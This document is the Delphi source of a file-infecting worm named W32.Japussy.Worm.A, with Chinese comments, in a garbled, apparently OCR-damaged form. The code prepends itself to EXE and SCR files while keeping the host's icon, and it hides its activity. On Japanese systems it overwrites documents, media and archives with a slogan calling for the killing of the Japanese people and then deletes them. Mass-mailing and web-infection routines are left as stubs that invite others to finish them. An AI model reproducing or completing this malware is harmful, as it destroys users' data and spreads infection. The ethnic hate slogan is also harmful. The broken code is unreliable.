///program Japussy;//uses

//Windows, SysUtils, Classes, Graphics, ShellAPI,

//Registry);

const

//HeaderSize = 82432;//病毒體的大小

//lconOffset = $12EB8;//PE文件主圖標(biāo)的偏移量

//在我的Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同

//查找 2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量

//HeaderSize =38912;//Upx壓縮過病毒體的大小

//lconOffset =$92BC;//Upx壓縮過PE文件主圖標(biāo)的偏移量

//Upx 1.24W 用法:upx -9--8086 Japussy.exe

//lconSize = $2E8;//PE文件主圖標(biāo)的大小--744字節(jié)

//lconSize = $2E8;//PE文件主圖標(biāo)的大小--744字節(jié)

//lconTail =lconOffset +lconSize; //PE文件主圖標(biāo)的尾部

//ID =$44444444;//感染標(biāo)記

//垃圾碼，以備寫入

//Catchword = 'If a race need to be killed out, it mustbe Yamato.'+

//lf a country need to be destroyed, it must be

//Japan!'+

***W32//.Japussy.Worm.A ***!

[//$R*RES)

//function RegisterServiceProcess(dwProcessID

//dwType//: Integer):Integer;

//stdcall;externalKernel32.dll';//函數(shù)聲明

//var

//TmpFile//: string;

//SI//: STARTUPINFO:

//Pi//: PROCESS INFORMATION:

//lsJap//: Boolean = False;//日文操作系統(tǒng)標(biāo)記

//[判斷是否為Win9x}

//function IsWin9x: Boolean;

//var

Ver//: TOSVersionlnfo;

begin

Result := False;

Ver.dwOSVersionInfoSize :=

if (Ver.dwPlatformlD =

VER_PLATFORM _WIN32WINDOWS)then //Win9x

Result := True;

end;

//[在流之間復(fù)制》procedure CopyStream(Src: TStream; sStartPos:Integer; Dst: TStream;

dStartPos:Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position

//Src.Seek(sStartPos，0);

Dst.Seek(dStartPos,0):

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos,0);

Dst.Seek(dCurPos,0);

end;

//[將宿主文件從已感染的PE文件中分離出來，以備使

//用)

procedure ExtractFile(FileName: string);

var

sStream,dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0)

fmOpenRead or fmShareDenyNone)

try

dStream := TFileStream.Create(FileName

fmCreate);

try

fmCreate);

try

sStream.Seek(HeaderSize0);//跳過頭部的病毒部

//分

dStream.CopyFrom(sStream,sStream.Size

HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

//[填充STARTUPINFO結(jié)構(gòu)》

procedure FillStartuplnfo(var Si: STARTUPINFO:

State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

//[發(fā)帶毒郵件)

procedure SendMail:

begin

//哪位仁兄愿意完成之?

//哪位仁兄愿意完成之?

end;

//[感染PE文件》

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;coStream,DstStream: TMemoryStream;ilD: LongInt;

alcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[//0..1] of Char;

begin

try//出錯(cuò)則文件正在被使用，退出

//if CompareText(FileName，JAPUSSY.EXE)=0then//是自己則不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileNamefmOpenRead);

try

fori:= //0to $108 do//檢查PE文件頭

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf,2);

if (Buf[o]= //#80) and (Buf[1]= #69)then //PE標(biāo)記

begin

if (Buf[o]= //#80) and (Buf[1]= #69) then //PE標(biāo)記

begin

IsPE := True;//是PE文件

Break;

end;

end;SrcStream.Seek(-4,soFromEnd);//檢查感染標(biāo)記

//SrcStream.Read(ilD，4);if (ilD =ID) or (SrcStream.Size <10240) then //太小的文件不感染

lnfected := True;

finally

SrcStream.Free;

end;

ifInfected or(notlsPE) then //如果感染過了或不是

//PE文件則退出

Exit;

lcoStream := TMemoryStream.CreateDstStream := TMemoryStream.Create:

try

alcon := TIcon.Create;

trv

//得到被感染文件的主圖標(biāo)(744字節(jié))，存入流

alcon.ReleaseHandle;

alcon.Handle := Extractlcon(HInstance

//PChar(FileName)，0);

alcon.SaveToStream(lcoStream);

alcon.SaveToStream(lcoStream);

finally

alcon.Free;

end;

SrcStream := TFileStream.Create(FileNamefmOpenRead);

//頭文件

HdrStream := TFileStream.Create(ParamStr(0)fmOpenRead or fmShareDenyNone);

trv

//I/寫入病毒體主圖標(biāo)之前的數(shù)據(jù)

CopyStream(HdrStream, 0, DstStream, //0IconOffset);

//I/寫入目前程序的主圖標(biāo)

CopyStream(lcoStream, 22, DstStream, IconOffset,lconSize);

//寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù)

CopyStream(HdrStream,IconTail,DstStreamIconTail,HeaderSize -IconTail);//寫入宿主程序

CopyStream(SrcStream,0. DstStream, HeaderSizeSrcStream.Size);

//寫入已感染的標(biāo)記

DstStream.Seek(0, 2);

ilD := $44444444;

DstStream.Write(ilD, 4);

finally

DstStream.Write(ilD, 4):finally

HdrStream.Free;

end;

finally

SrcStream.Free;

lcoStream.Free;

DstStream.SaveToFile(FileName);//替換宿主文件

DstStream.Free;

end;

except;

end;

end;

//[將目標(biāo)文件寫入垃圾碼后刪除}

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i,Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName),0);//去掉只讀屬

//生

FileHandle := FileOpen(FileName fmOpenWrite); //打開文件

try

Size := GetFileSize(FileHandle,nil);//文件大小

i:= 0;

Randomize;

Max := Random(15);//寫入垃圾碼的隨機(jī)次數(shù)

if Max < 5 then

Max := 5;

Mass := Size div Max;//每個(gè)間隔塊的大小

Len := Length(Catchword);

whilei< Max do

begin

FileSeek(FileHandle,i* Mass,0);//定位

//寫入垃圾碼，將文件徹底破壞掉

FileWrite(FileHandle, Catchword, Len);Inc();

end;

finally

FileClose(FileHandle);//關(guān)閉文件

end;

DeleteFile(PChar(FileName)); //刪除之

except

end;

end;

//[獲得可寫的驅(qū)動(dòng)器列表}

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

begin

fori:= //0to 25 do//遍歷26個(gè)字母

begin

D := Chr(i +65);

//Str := D+'

DiskType := GetDriveType(PChar(Str));//得到本地磁盤和網(wǎng)絡(luò)盤

if (DiskType = DRIVE_FIXED) or (DiskType =DRIVE_REMOTE) then

Result := Result + D;

end;

end;

//[遍歷目錄，感染和摧毀文件}

procedure LoopFiles(Path, Mask: string);var

//，Count: Integer:

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec):

Integer;

begin

if (SearchRec.Attr <> 16) and (SearchRec.Name <>

)and

//(SearchRec.Name <>'..!) then

Result := 0//不是目錄

else if (SearchRec.Attr = 16) and (SearchRec.Name

<>!)and

(SearchRec.Name <> !..) then

//(SearchRec.Name <>'.) thenResult := 1/不是根目錄

else Result := 2;//是根目錄

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec)=

0) then

begin

repeat

PeekMessage(Msg,0,0,0,PM_REMOVE);//調(diào)整消息隊(duì)列，避免引起懷疑

if lsValidDir(SearchRec)= 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = 'EXE') or (Ext = 'SCR') thenbegin

InfectOneFile(Fn);//感染可執(zhí)行文件

end

//else if (Ext = 'HTM') or (Ext = !HTML) or (Ext =.ASP') then

begin

//感染HTML和ASP文件，將Base64編碼后的病毒寫

//感染瀏覽此網(wǎng)頁的所有用戶

//哪位大兄弟愿意完成之?

end

else if Ext ='WAB' then //Outlook地址簿文件

//else if Ext =!WAB' then //Outlook地址簿文件

begin

//獲取Outlook郵件地址

end

//else if Ext =!ADC' then //Foxmail地址自動(dòng)完成文件

begin

//獲取Foxmail 郵件地址

end

else if Ext ='IND' then //Foxmail地址簿文件

begin

//獲取Foxmail郵件地址

end

else

begin

iflsJap then //是倭文操作系統(tǒng)

begin

//if (Ext ='.DOC') or (Ext = !XLS') or (Ext = 'MDB') or

(Ext ='MP3') or (Ext = RM') or (Ext =RA') or

(Ext ='.WMA') or (Ext = ZIP') or (Ext = RAR') or

(Ext ='.MPEG') or (Ext = ASF) or (Ext =JPG')or(Ext ='.JPEG') or (Ext = GIF) or (Ext = SWF') or(Ext ='.PDF') or (Ext =!.CHM) or (Ext ='AVI') thenSmashFile(Fn);//摧毀文件

end;

end;

end;

//感染或刪除一個(gè)文件后睡眠 200毫秒，避免CPU 占用率過高引起懷疑

Sleep(200);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

//if (FindFirst(Path +'**1, faDirectory, SearchRec) = 0)

then

begin

repeat

if lsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

fori := 0 to Count do

//LoopFiles(Path + SubDir.Strings[i] +"Mask);FreeAndNil(SubDir);

end;

//[遍歷磁盤上所有的文件]

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP =932 then //日文操作系統(tǒng)lsJap := True;//去死吧!

DriverList := GetDrives;//得到可寫的磁盤列表Len := Length(DriverList);while True do//死循環(huán)

begin

fori:= Len downto //1do //遍歷每個(gè)磁盤驅(qū)動(dòng)器LoopFiles(DriverList[i] +':**);//感染之SendMail;/l發(fā)帶毒郵件

//

//Sleep(1000*60*5);/眠5分鐘

end;

end;

//(主程序開始//

}

begin

iflsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1)/注冊(cè)為服務(wù)進(jìn)程

else //WinNT

begin

//遠(yuǎn)程線程映射到Explorer進(jìn)程

//哪位兄臺(tái)愿意完成之?

end;

//如果是原始病毒體自己

if CompareText(ExtractFileName(ParamStr(0))

//Japussy.exe') = 0 then

InfectFiles//感染和發(fā)郵件

else//已寄生于宿主程序上了，開始工作

begin

//TmpFile := ParamStr(0);/創(chuàng)建臨時(shí)文件

Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + ///#32+.exe';//真正的宿主文件，多一個(gè)空格

ExtractFile(TmpFile);//分離之

///FillStartupInfo(Si,SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile),PChar(TmpFile), nil,nil，True.

//0,nil,',Si,Pi);//創(chuàng)建新進(jìn)程運(yùn)行之

InfectFiles;//感染和發(fā)郵件

end;

end.